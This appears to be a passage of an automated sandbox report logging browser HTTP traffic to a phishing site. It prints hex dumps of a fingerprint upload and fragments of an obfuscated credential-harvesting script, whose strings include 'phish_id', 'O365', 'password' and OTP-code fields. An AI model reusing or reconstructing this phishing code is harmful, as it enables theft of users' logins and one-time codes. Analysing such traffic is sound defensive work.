                                        Data Ascii: ortSignal%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22AbortController%22%3A%22function+AbortController%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22offscreenBuffering%22%3Atrue%2C%22WebAssembly%22%3A%22%5Bobject+WebAssembly%5D%22%2C%22AbsoluteOrientationSensor%22%
                                        2024-10-24 01:40:22 UTC16384OUTData Raw: 75 74 54 72 61 6e 73 66 65 72 50 61 63 6b 65 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 55 53 42 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76
                                        Data Ascii: utTransferPacket%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22USBIsochronousOutTransferResult%22%3A%22function+USBIsochronousOutTransferResult%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22USBOutTransferResult%22%3A%22function+USBOutTransferResult%28%29+%7B+%5Bnativ
                                        2024-10-24 01:40:22 UTC16384OUTData Raw: 4d 65 64 69 61 53 74 72 65 61 6d 41 75 64 69 6f 44 65 73 74 69 6e 61 74 69 6f 6e 4e 6f 64 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 74 72 65 61 6d 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 6f 75 72 63 65 48 61 6e 64 6c 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 6f 75 72 63 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 52 65 63 6f 72 64 65 72 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 4c 69 73 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 72 72 6f 72 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 6e 63 72 79 70 74 65 64 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 6c 65 6d 65 6e
                                        Data Ascii: MediaStreamAudioDestinationNode%22%2C%22MediaStream%22%2C%22MediaSourceHandle%22%2C%22MediaSource%22%2C%22MediaRecorder%22%2C%22MediaQueryListEvent%22%2C%22MediaQueryList%22%2C%22MediaList%22%2C%22MediaError%22%2C%22MediaEncryptedEvent%22%2C%22MediaElemen
                                        2024-10-24 01:40:22 UTC16384OUTData Raw: 61 75 74 6f 73 74 61 74 65 63 68 61 6e 67 65 25 32 32 25 32 43 25 32 32 6f 6e 73 63 72 6f 6c 6c 65 6e 64 25 32 32 25 32 43 25 32 32 41 6e 69 6d 61 74 69 6f 6e 50 6c 61 79 62 61 63 6b 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 41 6e 69 6d 61 74 69 6f 6e 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 43 53 53 41 6e 69 6d 61 74 69 6f 6e 25 32 32 25 32 43 25 32 32 43 53 53 54 72 61 6e 73 69 74 69 6f 6e 25 32 32 25 32 43 25 32 32 44 6f 63 75 6d 65 6e 74 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 4d 61 6e 61 67 65 72 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 52 65 63 6f 72 64 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 52 65 67 69 73 74 72 61 74 69
                                        Data Ascii: autostatechange%22%2C%22onscrollend%22%2C%22AnimationPlaybackEvent%22%2C%22AnimationTimeline%22%2C%22CSSAnimation%22%2C%22CSSTransition%22%2C%22DocumentTimeline%22%2C%22BackgroundFetchManager%22%2C%22BackgroundFetchRecord%22%2C%22BackgroundFetchRegistrati
                                        2024-10-24 01:40:22 UTC7992OUTData Raw: 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 43 6f 6d 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 43 6f 6d 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74
                                        Data Ascii: +%5Bnative+code%5D+%7D%22%2C%22createComment%22%3A%22function+createComment%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createDocumentFragment%22%3A%22function+createDocumentFragment%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createElement%22%3A%22function+creat
                                        2024-10-24 01:40:22 UTC234INHTTP/1.1 200 OK
                                        Date: Thu, 24 Oct 2024 01:40:22 GMT
                                        Server: Apache
                                        X-Powered-By: PHP/7.2.34
                                        Cache-Control: no-store
                                        X-Powered-By: PleskLin
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        2024-10-24 01:40:22 UTC371INData Raw: 31 36 65 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 69 64 3d 27 68 74 6d 6c 27 20 73 74 69 3d 27 56 6c 5a 4f 52 6c 56 71 52 54 4a 4e 56 45 46 35 54 55 52 4a 4d 46 5a 55 52 58 68 4e 56 45 46 34 54 6d 70 52 4d 77 3d 3d 27 20 76 69 63 3d 27 27 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 6f 63 6b 65 74 2e 69 6f 2f 34 2e 37 2e 35 2f 73 6f 63 6b 65 74 2e 69 6f 2e 6d 69 6e 2e 6a 73 27 20 69 6e 74 65 67 72 69 74 79 3d 27 73 68 61 33 38 34 2d 32 68 75 61 5a 76 4f 52 39 69 44 7a 48 71 73 6c 71 77 70 52 38 37 69 73 45 6d 72 66 78 71 79 57 4f 46 37 68 72 37 42 59 36 4b 47 30 2b 68 56 4b 4c 6f 45 58 4d 50 55 4a 77 33 79 6e 57 75 68
                                        Data Ascii: 16e<!DOCTYPE html><html id='html' sti='VlZORlVqRTJNVEF5TURJMFZURXhNVEF4TmpRMw==' vic='' lang='en'><head> <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hVKLoEXMPUJw3ynWuh


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.1649707157.230.134.734436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-24 01:40:22 UTC655OUTGET /o/jsnom.js HTTP/1.1
                                        Host: chiquitzinbb.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: script
                                        Referer: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: _cid=113903e38d58c1cba4bae1499e6181af
                                        2024-10-24 01:40:23 UTC274INHTTP/1.1 200 OK
                                        Date: Thu, 24 Oct 2024 01:40:23 GMT
                                        Server: Apache
                                        Last-Modified: Wed, 23 Oct 2024 09:34:45 GMT
                                        ETag: "18779-6252198a61007"
                                        Accept-Ranges: bytes
                                        Content-Length: 100217
                                        X-Powered-By: PleskLin
                                        Connection: close
                                        Content-Type: application/javascript
                                        2024-10-24 01:40:23 UTC16384INData Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 35 39 65 62 30 35 20 3d 20 5f 30 78 35 39 65 62 28 29 3b 20 72 65 74 75 72 6e 20 5f 30 78 31 66 61 65 20 3d 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 66 61 65 35 39 2c 20 5f 30 78 33 39 31 66 64 35 29 20 7b 20 5f 30 78 31 66 61 65 35 39 20 3d 20 5f 30 78 31 66 61 65 35 39 20 2d 20 30 78 65 61 3b 20 6c 65 74 20 5f 30 78 63 62 63 31 36 39 20 3d 20 5f 30 78 35 39 65 62 30 35 5b 5f 30 78 31 66 61 65 35 39 5d 3b 20 72 65 74 75 72 6e 20 5f 30 78 63 62 63 31 36 39 3b 20 7d 2c 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 3b 20 7d 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33
                                        Data Ascii: function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3
                                        2024-10-24 01:40:23 UTC16384INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 66 6f 72 6d 42 75 74 74 6f 6e 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 70 6f 73 69 74 69 6f 6e 3a 5c 78 32 30 72 65 6c 61 74 69 76 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 5c 78 32 30 23 30 30 36 37 62 38 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 5c 78 32 30 23 30 30 36 37 62 38 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78
                                        Data Ascii: 0\x20\x20\x0a\x20\x20\x20\x20.formButton\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20position:\x20relative;\x0a\x20\x20\x20\x20\x20\x20\x20\x20border-color:\x20#0067b8;\x0a\x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20#0067b8;\x0a\x20\x20\x20\x20\x20\x
                                        2024-10-24 01:40:23 UTC16384INData Raw: 74 2d 6b 65 79 66 72 61 6d 65 73 5c 78 32 30 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 30 25 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6c 65 66 74 3a 5c 78 32 30 63 61 6c 63 28 2d 35 30 25 5c 78 32 30 2d 5c 78 32 30 35 70 78 29 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 37 35 25 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32
                                        Data Ascii: t-keyframes\x20dot-floating\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x200%\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20left:\x20calc(-50%\x20-\x205px);\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x2075%\x20{\x0a\x20\x20\x2
                                        2024-10-24 01:40:23 UTC16384INData Raw: 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 5c 78 32 30 31 35 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 5c 78 32 30 32 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 6e 65 77 32 5c
                                        Data Ascii: 0\x20\x20margin-left:\x2015px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin-bottom:\x2020px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20.new2\
                                        2024-10-24 01:40:23 UTC16384INData Raw: 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 62 75 74 74 6f 6e 5c 78 32 30 69 64 3d 5c 78 32 32 73 65 6e 64 41 70 70 43 6f 64 65 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 6f 72 6d 42 75 74 74 6f 6e 5c 78 32 32 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 73 75 62 6d 69 74 5c 78 32 32 3e 56 65 72 69 66 79 3c 2f 62 75 74 74 6f 6e 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 21 2d 2d 5c 78 32 30 50 48 4f 4e 45 5c 78 32 30 2d 2d
                                        Data Ascii: v>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<button\x20id=\x22sendAppCode\x22\x20class=\x22formButton\x22\x20type=\x22submit\x22>Verify</button>\x0a\x20\x20\x20\x20\x20\x20\x20\x20</div>\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20...\x20PHONE\x20--
                                        2024-10-24 01:40:23 UTC16384INData Raw: 32 65 34 64 61 28 30 78 66 66 29 20 2b 20 5f 30 78 34 66 31 66 33 32 5b 5f 30 78 31 32 65 34 64 61 28 30 78 31 31 66 29 5d 20 2b 20 27 5c 78 32 37 29 27 2c 20 5f 30 78 34 66 31 66 33 32 5b 27 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 27 5d 20 21 3d 20 5f 30 78 31 32 65 34 64 61 28 30 78 31 36 38 29 20 26 26 20 5f 30 78 34 66 31 66 33 32 5b 5f 30 78 31 32 65 34 64 61 28 30 78 66 33 29 5d 20 21 3d 20 5f 30 78 31 32 65 34 64 61 28 30 78 31 36 34 29 20 26 26 20 28 5f 30 78 32 33 33 31 65 63 5b 5f 30 78 31 32 65 34 64 61 28 30 78 31 37 38 29 5d 5b 5f 30 78 31 32 65 34 64 61 28 30 78 66 36 29 5d 20 3d 20 5f 30 78 31 32 65 34 64 61 28 30 78 65 65 29 29 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 5f 30 78 34 66 31 66 33 32 20 3d 3d 3d 20 27 4c 44
                                        Data Ascii: 2e4da(0xff) + _0x4f1f32[_0x12e4da(0x11f)] + '\x27)', _0x4f1f32['backgroundImage'] != _0x12e4da(0x168) && _0x4f1f32[_0x12e4da(0xf3)] != _0x12e4da(0x164) && (_0x2331ec[_0x12e4da(0x178)][_0x12e4da(0xf6)] = _0x12e4da(0xee))); if (_0x4f1f32 === 'LD
                                        2024-10-24 01:40:23 UTC1913INData Raw: 20 27 2e 62 61 63 6b 41 72 72 6f 77 27 2c 20 27 40 6d 61 69 6c 2e 27 2c 20 27 40 67 6d 61 69 6c 2e 63 6f 6d 27 2c 20 27 6c 6f 63 61 74 69 6f 6e 27 2c 20 27 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 27 2c 20 27 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 27 2c 20 27 70 68 69 73 68 5f 69 64 27 2c 20 27 75 73 65 72 4c 61 6e 67 75 61 67 65 27 2c 20 27 40 31 36 33 2e 27 2c 20 27 70 61 73 73 77 6f 72 64 5f 63 6f 6d 6d 61 6e 64 27 2c 20 27 70 61 73 73 77 6f 72 64 27 2c 20 27 31 38 33 37 32 32 34 75 42 70 6b 6c 77 27 2c 20 27 6e 65 77 2d 73 65 73 73 69 6f 6e 27 2c 20 27 2e 65 6d 61 69 6c 4c 61 62 65 6c 27 2c 20 27 40 70 72 6f 74 6f 6e 6d 61 69 6c 2e 27 2c 20 27 4f 33 36 35 27 2c 20 27 52 51 5f 4f 54 50 5f 41 50 50 5f 43 4f 44 45 27 2c 20 27 76 61 6c 75
                                        Data Ascii: '.backArrow', '@mail.', '@gmail.com', 'location', 'https://google.com', 'preventDefault', 'phish_id', 'userLanguage', '@163.', 'password_command', 'password', '1837224uBpklw', 'new-session', '.emailLabel', '@protonmail.', 'O365', 'RQ_OTP_APP_CODE', 'valu


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.164970918.245.31.334436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-24 01:40:23 UTC566OUTGET /4.7.5/socket.io.min.js HTTP/1.1
                                        Host: cdn.socket.io
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        Origin: https://chiquitzinbb.com
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: script
                                        Referer: https://chiquitzinbb.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-10-24 01:40:24 UTC702INHTTP/1.1 200 OK
                                        Content-Type: application/javascript; charset=utf-8
                                        Content-Length: 49993
                                        Connection: close
                                        Accept-Ranges: bytes
                                        Access-Control-Allow-Origin: *
                                        Cache-Control: public, max-age=31536000, immutable
                                        Content-Disposition: inline; filename="socket.io.min.js"
                                        Date: Sat, 03 Aug 2024 07:26:50 GMT
                                        ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a"
                                        Server: Vercel
                                        Strict-Transport-Security: max-age=63072000
                                        X-Vercel-Cache: HIT
                                        X-Vercel-Id: fra1::4xmtd-1722670010047-e30d468233ba
                                        X-Cache: Hit from cloudfront
                                        Via: 1.1 67cd7fbfa7b3b35b6217719b3f0167d2.cloudfront.net (CloudFront)
                                        X-Amz-Cf-Pop: FRA56-P8
                                        X-Amz-Cf-Id: EPpEgJEnhXrBGUzqkkF9lqNeoMZ6h0VGFxnJ5jRTUxsHBHB7yJNXXw==
                                        Age: 7441414
                                        2024-10-24 01:40:24 UTC16384INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 37 2e 35 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 34 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                        Data Ascii: /*! * Socket.IO v4.7.5 * (c) 2014-2024 Guillermo Rauch * Released under the MIT License. */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof g
                                        2024-10-24 01:40:24 UTC16384INData Raw: 66 20 64 6f 63 75 6d 65 6e 74 29 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 61 74 74 61 63 68 45 76 65 6e 74 29 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 75 6e 6c 6f 61 64 22 2c 61 65 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 29 7b 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6f 6e 70 61 67 65 68 69 64 65 22 69 6e 20 49 3f 22 70 61 67 65 68 69 64 65 22 3a 22 75 6e 6c 6f 61 64 22 2c 61 65 2c 21 31 29 7d 66 75 6e 63 74 69 6f 6e 20 61 65 28 29 7b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 73 65 2e 72 65 71 75 65 73 74 73 29 73 65 2e 72 65 71 75 65 73 74 73 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 65 29 26 26 73 65 2e 72 65 71 75
                                        Data Ascii: f document)if("function"==typeof attachEvent)attachEvent("onunload",ae);else if("function"==typeof addEventListener){addEventListener("onpagehide"in I?"pagehide":"unload",ae,!1)}function ae(){for(var e in se.requests)se.requests.hasOwnProperty(e)&&se.requ
                                        2024-10-24 01:40:24 UTC16384INData Raw: 74 61 20 77 68 65 6e 20 72 65 63 6f 6e 73 74 72 75 63 74 69 6e 67 20 61 20 70 61 63 6b 65 74 22 29 3b 76 61 72 20 6e 3d 28 74 3d 74 68 69 73 2e 64 65 63 6f 64 65 53 74 72 69 6e 67 28 65 29 29 2e 74 79 70 65 3d 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 3b 6e 7c 7c 74 2e 74 79 70 65 3d 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 3f 28 74 2e 74 79 70 65 3d 6e 3f 42 65 2e 45 56 45 4e 54 3a 42 65 2e 41 43 4b 2c 74 68 69 73 2e 72 65 63 6f 6e 73 74 72 75 63 74 6f 72 3d 6e 65 77 20 50 65 28 74 29 2c 30 3d 3d 3d 74 2e 61 74 74 61 63 68 6d 65 6e 74 73 26 26 70 28 73 28 69 2e 70 72 6f 74 6f 74 79 70 65 29 2c 22 65 6d 69 74 52 65 73 65 72 76 65 64 22 2c 74 68 69 73 29 2e 63 61 6c 6c 28 74 68 69 73 2c 22 64 65 63 6f 64 65 64 22 2c 74 29 29 3a 70 28 73 28 69
                                        Data Ascii: ta when reconstructing a packet");var n=(t=this.decodeString(e)).type===Be.BINARY_EVENT;n||t.type===Be.BINARY_ACK?(t.type=n?Be.EVENT:Be.ACK,this.reconstructor=new Pe(t),0===t.attachments&&p(s(i.prototype),"emitReserved",this).call(this,"decoded",t)):p(s(i
                                        2024-10-24 01:40:24 UTC841INData Raw: 26 28 65 3d 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 6e 2e 68 6f 73 74 29 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 22 2f 22 3d 3d 3d 65 2e 63 68 61 72 41 74 28 30 29 26 26 28 65 3d 22 2f 22 3d 3d 3d 65 2e 63 68 61 72 41 74 28 31 29 3f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 65 3a 6e 2e 68 6f 73 74 2b 65 29 2c 2f 5e 28 68 74 74 70 73 3f 7c 77 73 73 3f 29 3a 5c 2f 5c 2f 2f 2e 74 65 73 74 28 65 29 7c 7c 28 65 3d 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 65 3a 22 68 74 74 70 73 3a 2f 2f 22 2b 65 29 2c 72 3d 76 65 28 65 29 29 2c 72 2e 70 6f 72 74 7c 7c 28 2f 5e 28 68 74 74 70 7c 77 73 29 24 2f 2e 74 65 73 74 28 72 2e 70 72 6f 74 6f 63 6f 6c 29 3f 72 2e 70 6f 72 74 3d 22 38 30 22 3a 2f 5e 28 68 74
                                        Data Ascii: &(e=n.protocol+"//"+n.host),"string"==typeof e&&("/"===e.charAt(0)&&(e="/"===e.charAt(1)?n.protocol+e:n.host+e),/^(https?|wss?):\/\//.test(e)||(e=void 0!==n?n.protocol+"//"+e:"https://"+e),r=ve(e)),r.port||(/^(http|ws)$/.test(r.protocol)?r.port="80":/^(ht


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.1649710157.230.134.734436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-24 01:40:24 UTC397OUTGET /o/jsnom.js HTTP/1.1
                                        Host: chiquitzinbb.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: _cid=113903e38d58c1cba4bae1499e6181af
                                        2024-10-24 01:40:24 UTC274INHTTP/1.1 200 OK
                                        Date: Thu, 24 Oct 2024 01:40:24 GMT
                                        Server: Apache
                                        Last-Modified: Wed, 23 Oct 2024 09:34:45 GMT
                                        ETag: "18779-6252198a61007"
                                        Accept-Ranges: bytes
                                        Content-Length: 100217
                                        X-Powered-By: PleskLin
                                        Connection: close
                                        Content-Type: application/javascript
